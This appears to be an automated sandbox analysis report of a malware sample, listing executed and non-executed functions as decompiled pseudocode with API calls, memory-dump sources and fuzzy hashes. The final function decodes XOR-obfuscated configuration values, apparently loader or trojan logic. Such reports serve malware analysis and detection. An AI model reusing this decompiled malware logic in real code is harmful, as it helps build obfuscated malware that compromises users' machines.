                                                                                                                                  • API String ID: 397948122-0
                                                                                                                                  • Opcode ID: 3b291aa42b502ad7b8071a8226f5e19bfb21d209e3d8199ce4088e30458ffb3e
                                                                                                                                  • Instruction ID: 0e5f7628c40138758b98e0a2be1ddc8ed10fb8e4b145f4f77079984e40222125
                                                                                                                                  • Opcode Fuzzy Hash: 3b291aa42b502ad7b8071a8226f5e19bfb21d209e3d8199ce4088e30458ffb3e
                                                                                                                                  • Instruction Fuzzy Hash: BB019A32900119BFDB11DBA8DC009BBBBB8FF08350F008121FD01E7160E771A922D791
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000008,6E97A0D4,00000000), ref: 6E9314AF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                  • Opcode ID: 6fe1b53e5a61c75173237ffe55e9b83f85159e5349f253636f2765e3959dd77f
                                                                                                                                  • Instruction ID: 33ade8be65f4f0e96915dc9de31944de636d38c0d5e1cf206d72fab4f015bedb
                                                                                                                                  • Opcode Fuzzy Hash: 6fe1b53e5a61c75173237ffe55e9b83f85159e5349f253636f2765e3959dd77f
                                                                                                                                  • Instruction Fuzzy Hash: 2CF0E03160493557EB515AF7881CF9B37AD9F83770B31C5219C54D63A4DB30D8058DE1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 6E92F529
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                  • Opcode ID: 64a0d18479098e8249e61b7a6fe1fcc94f10701152f801b1fc03942833e6f722
                                                                                                                                  • Instruction ID: b4aae24ec62bebe0c19c65af47560dd3f1162ef81befb4fd04d73d92e0158a34
                                                                                                                                  • Opcode Fuzzy Hash: 64a0d18479098e8249e61b7a6fe1fcc94f10701152f801b1fc03942833e6f722
                                                                                                                                  • Instruction Fuzzy Hash: 87E0A0212296235EEE101EFA9804FAF365CBF426A8F2101709C14B628CEB10D8028EE0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • RtlEncodePointer.NTDLL(?), ref: 6E8F5C69
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EncodePointer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2118026453-0
                                                                                                                                  • Opcode ID: 4efdce0500cd4b2bf7b40e7b0934c8eff45945b34de0850ae5108fbd4135702c
                                                                                                                                  • Instruction ID: ea0b29dbe5e6a269ff91347ced616a4077e37ffaf3acb5e122e88cc3d2e5b3f4
                                                                                                                                  • Opcode Fuzzy Hash: 4efdce0500cd4b2bf7b40e7b0934c8eff45945b34de0850ae5108fbd4135702c
                                                                                                                                  • Instruction Fuzzy Hash: 21D0C9B000CF14DFDF05AF54E8147A43BB8FF07306F000428E40D93698D7B59468CA48
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A3AA89() {
                                                                                                                                  
                                                                                                                                  				E00A3ABF6(0xa3c2c4, 0xa3d0f4); // executed
                                                                                                                                  				goto __eax;
                                                                                                                                  			}




                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A3AA4E
                                                                                                                                    • Part of subcall function 00A3ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3AC6F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 123106877-0
                                                                                                                                  • Opcode ID: 93fa63fd8a7caf77a184c1700a69054d97018a4345087e79c68a2d4795a9e7fe
                                                                                                                                  • Instruction ID: ab351739d9b6df0ab51fd29dbe21f74fdca902c7485d7ebf75c6c938a4d11cbc
                                                                                                                                  • Opcode Fuzzy Hash: 93fa63fd8a7caf77a184c1700a69054d97018a4345087e79c68a2d4795a9e7fe
                                                                                                                                  • Instruction Fuzzy Hash: 8AB0129365C011BC3108B1982F13C37021CD0D1F20F30C41BFD42C0280D8444C460133
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A3AA93() {
                                                                                                                                  
                                                                                                                                  				E00A3ABF6(0xa3c2c4, 0xa3d0f0); // executed
                                                                                                                                  				goto __eax;
                                                                                                                                  			}




                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A3AA4E
                                                                                                                                    • Part of subcall function 00A3ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3AC6F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 123106877-0
                                                                                                                                  • Opcode ID: 2ecccc3572899ac8c2837253be135582f02572d7018bef2725841c93118fffd1
                                                                                                                                  • Instruction ID: 3b7e060de51df9173b9d609cf2deace61702486ec53730d3ba2123a45d91328c
                                                                                                                                  • Opcode Fuzzy Hash: 2ecccc3572899ac8c2837253be135582f02572d7018bef2725841c93118fffd1
                                                                                                                                  • Instruction Fuzzy Hash: 84B01293658011BC3108B1882F13E37021CE0D1F20F30C41BF842C0280D8440C450133
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A3AA3C() {
                                                                                                                                  
                                                                                                                                  				E00A3ABF6(0xa3c2c4, 0xa3d110); // executed
                                                                                                                                  				goto __eax;
                                                                                                                                  			}




                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A3AA4E
                                                                                                                                    • Part of subcall function 00A3ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3AC6F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 123106877-0
                                                                                                                                  • Opcode ID: 15dad527a8bd64dda5c9780fc79bf534755182fce9aeb1b06399fa039521284f
                                                                                                                                  • Instruction ID: a0a72c8a556d4e1576b0a8c33f351a13bf9974f1f0f562879214bca250bba1bd
                                                                                                                                  • Opcode Fuzzy Hash: 15dad527a8bd64dda5c9780fc79bf534755182fce9aeb1b06399fa039521284f
                                                                                                                                  • Instruction Fuzzy Hash: 8EB01293E58011BD312475852E03C37031DD0D0B60F30C91FF841D01C0D8440C440033
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A3AA61() {
                                                                                                                                  
                                                                                                                                  				E00A3ABF6(0xa3c2c4, 0xa3d104); // executed
                                                                                                                                  				goto __eax;
                                                                                                                                  			}



                                                                                                                                  0x00a3aa4e
                                                                                                                                  0x00a3aa55

                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A3AA4E
                                                                                                                                    • Part of subcall function 00A3ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3AC6F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 123106877-0
                                                                                                                                  • Opcode ID: 09d9c5046af6c8447efac0de94baa6c6a1ed593837edaf0a71dd6b4565d60c1f
                                                                                                                                  • Instruction ID: be56ba8164b7525b5742c13016d081084ef940833f98a04a965a435e4ee76627
                                                                                                                                  • Opcode Fuzzy Hash: 09d9c5046af6c8447efac0de94baa6c6a1ed593837edaf0a71dd6b4565d60c1f
                                                                                                                                  • Instruction Fuzzy Hash: 14B01293798011BD310471982F43C37421CC0D0B20F30C51BF841C0280D8440C451133
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A3AA6B() {
                                                                                                                                  
                                                                                                                                  				E00A3ABF6(0xa3c2c4, 0xa3d100); // executed
                                                                                                                                  				goto __eax;
                                                                                                                                  			}



                                                                                                                                  0x00a3aa4e
                                                                                                                                  0x00a3aa55

                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A3AA4E
                                                                                                                                    • Part of subcall function 00A3ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3AC6F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 123106877-0
                                                                                                                                  • Opcode ID: 4f14d2dd6c4c23d689a475b7c359dc3bd1e059ea5ec7205452c4e64647c777bd
                                                                                                                                  • Instruction ID: 86644e7901c4666752cae03c03e15df2cad49605cc27fa39ea0952e0d6372f91
                                                                                                                                  • Opcode Fuzzy Hash: 4f14d2dd6c4c23d689a475b7c359dc3bd1e059ea5ec7205452c4e64647c777bd
                                                                                                                                  • Instruction Fuzzy Hash: 65B01293798011BD310471882E03C37421CD0D0B20F30C51BF841C0280D8440C440133
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A3AA75() {
                                                                                                                                  
                                                                                                                                  				E00A3ABF6(0xa3c2c4, 0xa3d0fc); // executed
                                                                                                                                  				goto __eax;
                                                                                                                                  			}



                                                                                                                                  0x00a3aa4e
                                                                                                                                  0x00a3aa55

                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A3AA4E
                                                                                                                                    • Part of subcall function 00A3ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3AC6F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 123106877-0
                                                                                                                                  • Opcode ID: 03d13d4f0f706822a5319b1712f406c10cb701539035f32d5440144966037335
                                                                                                                                  • Instruction ID: cb2cd72756872232e31262eb5888449c6bdc6b3e0b66730b35ef857e5763442e
                                                                                                                                  • Opcode Fuzzy Hash: 03d13d4f0f706822a5319b1712f406c10cb701539035f32d5440144966037335
                                                                                                                                  • Instruction Fuzzy Hash: 67B01293658011FC3108B1882E53C37021CD0D1F20F30C41BFC42C0280D8440C450133
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A3AA7F() {
                                                                                                                                  
                                                                                                                                  				E00A3ABF6(0xa3c2c4, 0xa3d0f8); // executed
                                                                                                                                  				goto __eax;
                                                                                                                                  			}



                                                                                                                                  0x00a3aa4e
                                                                                                                                  0x00a3aa55

                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A3AA4E
                                                                                                                                    • Part of subcall function 00A3ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3AC6F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 123106877-0
                                                                                                                                  • Opcode ID: d7500057c6f908c8a49ad48b74b54876c19aec0944f2599c5b4efc96f458128f
                                                                                                                                  • Instruction ID: 76693d501790f6830603419c3530894f90d3a8353e4bc3661c5f7717bf3500e3
                                                                                                                                  • Opcode Fuzzy Hash: d7500057c6f908c8a49ad48b74b54876c19aec0944f2599c5b4efc96f458128f
                                                                                                                                  • Instruction Fuzzy Hash: 72B012D3658111BC3208B1882E53C77021CD0D1F20F30C51BF842C0280D8440C890133
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A3AA57() {
                                                                                                                                  
                                                                                                                                  				E00A3ABF6(0xa3c2c4, 0xa3d108); // executed
                                                                                                                                  				goto __eax;
                                                                                                                                  			}



                                                                                                                                  0x00a3aa4e
                                                                                                                                  0x00a3aa55

                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A3AA4E
                                                                                                                                    • Part of subcall function 00A3ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3AC6F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 123106877-0
                                                                                                                                  • Opcode ID: 697a24182e0afd54b40dcd8de58b2af4a9daec722c3339a53352f7efd2c223d8
                                                                                                                                  • Instruction ID: c0ea5801cc510e5fdc5b7cadcd0fc83e3e64c90ceec671279b26bf89cbb024af
                                                                                                                                  • Opcode Fuzzy Hash: 697a24182e0afd54b40dcd8de58b2af4a9daec722c3339a53352f7efd2c223d8
                                                                                                                                  • Instruction Fuzzy Hash: 67B0129379C111BD314471886E03C37421CC0D0B20F30C61BF881C0280D8840C840133
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A3AB31() {
                                                                                                                                  
                                                                                                                                  				E00A3ABF6(0xa3c344, 0xa3d134); // executed
                                                                                                                                  				goto __eax;
                                                                                                                                  			}



                                                                                                                                  0x00a3ab28
                                                                                                                                  0x00a3ab2f

                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A3AB28
                                                                                                                                    • Part of subcall function 00A3ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3AC6F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 123106877-0
                                                                                                                                  • Opcode ID: c4446abff6670481da433d381b449aba6c244f9dbaa1bec677afd272d8cb083f
                                                                                                                                  • Instruction ID: 022e19c1e84235f955653af6199cb77e7c71f3b32f4457816b00cbea6dd7ee75
                                                                                                                                  • Opcode Fuzzy Hash: c4446abff6670481da433d381b449aba6c244f9dbaa1bec677afd272d8cb083f
                                                                                                                                  • Instruction Fuzzy Hash: 19B0129125A011FD7204551C3E13C37821EC0D0B20F30C52BF841C8140D8404C411233
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A3AB16() {
                                                                                                                                  
                                                                                                                                  				E00A3ABF6(0xa3c344, 0xa3d124); // executed
                                                                                                                                  				goto __eax;
                                                                                                                                  			}




                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A3AB28
                                                                                                                                    • Part of subcall function 00A3ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3AC6F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 123106877-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                  			E6E8D15A0(void* __eax, intOrPtr _a4) {
                                                                                                                                  
                                                                                                                                  				 *0x6e8d41d0 =  *0x6e8d41d0 & 0x00000000;
                                                                                                                                  				_push(0);
                                                                                                                                  				_push(0x6e8d41cc);
                                                                                                                                  				_push(1);
                                                                                                                                  				_push(_a4);
                                                                                                                                  				 *0x6e8d41c8 = 0xc; // executed
                                                                                                                                  				L6E8D1764(); // executed
                                                                                                                                  				return __eax;
                                                                                                                                  			}




                                                                                                                                  APIs
                                                                                                                                  • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(6E8D10E6,00000001,6E8D41CC,00000000), ref: 6E8D15BE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682224691.000000006E8D1000.00000020.00020000.sdmp, Offset: 6E8D0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.682210972.000000006E8D0000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682249539.000000006E8D3000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682273423.000000006E8D5000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682314087.000000006E8D6000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DescriptorSecurity$ConvertString
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3907675253-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A375F6(long _a4) {
                                                                                                                                  				void* _t2;
                                                                                                                                  
                                                                                                                                  				_t2 = RtlAllocateHeap( *0xa3d270, 0, _a4); // executed
                                                                                                                                  				return _t2;
                                                                                                                                  			}





                                                                                                                                  APIs
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000000,00A34F70), ref: 00A37602
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Non-executed Functions

                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E00A34C40(int* __ecx) {
                                                                                                                                  				int _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				void* _v16;
                                                                                                                                  				void* __esi;
                                                                                                                                  				signed int _t28;
                                                                                                                                  				signed int _t33;
                                                                                                                                  				signed int _t39;
                                                                                                                                  				char* _t45;
                                                                                                                                  				char* _t46;
                                                                                                                                  				char* _t47;
                                                                                                                                  				char* _t48;
                                                                                                                                  				char* _t49;
                                                                                                                                  				char* _t50;
                                                                                                                                  				void* _t51;
                                                                                                                                  				void* _t52;
                                                                                                                                  				void* _t53;
                                                                                                                                  				intOrPtr _t54;
                                                                                                                                  				void* _t56;
                                                                                                                                  				intOrPtr _t57;
                                                                                                                                  				intOrPtr _t58;
                                                                                                                                  				signed int _t61;
                                                                                                                                  				intOrPtr _t64;
                                                                                                                                  				signed int _t65;
                                                                                                                                  				signed int _t70;
                                                                                                                                  				void* _t72;
                                                                                                                                  				void* _t73;
                                                                                                                                  				signed int _t75;
                                                                                                                                  				signed int _t78;
                                                                                                                                  				signed int _t82;
                                                                                                                                  				signed int _t86;
                                                                                                                                  				signed int _t90;
                                                                                                                                  				signed int _t94;
                                                                                                                                  				signed int _t98;
                                                                                                                                  				void* _t103;
                                                                                                                                  				intOrPtr _t121;
                                                                                                                                  
                                                                                                                                  				_t104 = __ecx;
                                                                                                                                  				_t28 =  *0xa3d2dc; // 0x69b25f44
                                                                                                                                  				if(E00A35657( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
                                                                                                                                  					 *0xa3d310 = _v8;
                                                                                                                                  				}
                                                                                                                                  				_t33 =  *0xa3d2dc; // 0x69b25f44
                                                                                                                                  				if(E00A35657( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
                                                                                                                                  					_v12 = 2;
                                                                                                                                  					L69:
                                                                                                                                  					return _v12;
                                                                                                                                  				}
                                                                                                                                  				_t39 =  *0xa3d2dc; // 0x69b25f44
                                                                                                                                  				if(E00A35657( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
                                                                                                                                  					L67:
                                                                                                                                  					HeapFree( *0xa3d270, 0, _v16);
                                                                                                                                  					goto L69;
                                                                                                                                  				} else {
                                                                                                                                  					_t103 = _v12;
                                                                                                                                  					if(_t103 == 0) {
                                                                                                                                  						_t45 = 0;
                                                                                                                                  					} else {
                                                                                                                                  						_t98 =  *0xa3d2dc; // 0x69b25f44
                                                                                                                                  						_t45 = E00A33BB8(_t104, _t103, _t98 ^ 0x7895433b);
                                                                                                                                  					}
                                                                                                                                  					if(_t45 != 0) {
                                                                                                                                  						_t104 =  &_v8;
                                                                                                                                  						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                                                                                                                                  							 *0xa3d278 = _v8;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					if(_t103 == 0) {
                                                                                                                                  						_t46 = 0;
                                                                                                                                  					} else {
                                                                                                                                  						_t94 =  *0xa3d2dc; // 0x69b25f44
                                                                                                                                  						_t46 = E00A33BB8(_t104, _t103, _t94 ^ 0x219b08c7);
                                                                                                                                  					}
                                                                                                                                  					if(_t46 != 0) {
                                                                                                                                  						_t104 =  &_v8;
                                                                                                                                  						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                                                                                                                                  							 *0xa3d27c = _v8;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					if(_t103 == 0) {
                                                                                                                                  						_t47 = 0;
                                                                                                                                  					} else {
                                                                                                                                  						_t90 =  *0xa3d2dc; // 0x69b25f44
                                                                                                                                  						_t47 = E00A33BB8(_t104, _t103, _t90 ^ 0x31fc0661);
                                                                                                                                  					}
                                                                                                                                  					if(_t47 != 0) {
                                                                                                                                  						_t104 =  &_v8;
                                                                                                                                  						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                                                                                                                                  							 *0xa3d280 = _v8;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					if(_t103 == 0) {
                                                                                                                                  						_t48 = 0;
                                                                                                                                  					} else {
                                                                                                                                  						_t86 =  *0xa3d2dc; // 0x69b25f44
                                                                                                                                  						_t48 = E00A33BB8(_t104, _t103, _t86 ^ 0x0cd926ce);
                                                                                                                                  					}
                                                                                                                                  					if(_t48 != 0) {
                                                                                                                                  						_t104 =  &_v8;
                                                                                                                                  						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
                                                                                                                                  							 *0xa3d004 = _v8;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					if(_t103 == 0) {
                                                                                                                                  						_t49 = 0;
                                                                                                                                  					} else {
                                                                                                                                  						_t82 =  *0xa3d2dc; // 0x69b25f44
                                                                                                                                  						_t49 = E00A33BB8(_t104, _t103, _t82 ^ 0x3cd8b2cb);
                                                                                                                                  					}
                                                                                                                                  					if(_t49 != 0) {
                                                                                                                                  						_t104 =  &_v8;
                                                                                                                                  						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
                                                                                                                                  							 *0xa3d02c = _v8;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					if(_t103 == 0) {
                                                                                                                                  						_t50 = 0;
                                                                                                                                  					} else {
                                                                                                                                  						_t78 =  *0xa3d2dc; // 0x69b25f44
                                                                                                                                  						_t50 = E00A33BB8(_t104, _t103, _t78 ^ 0x2878b929);
                                                                                                                                  					}
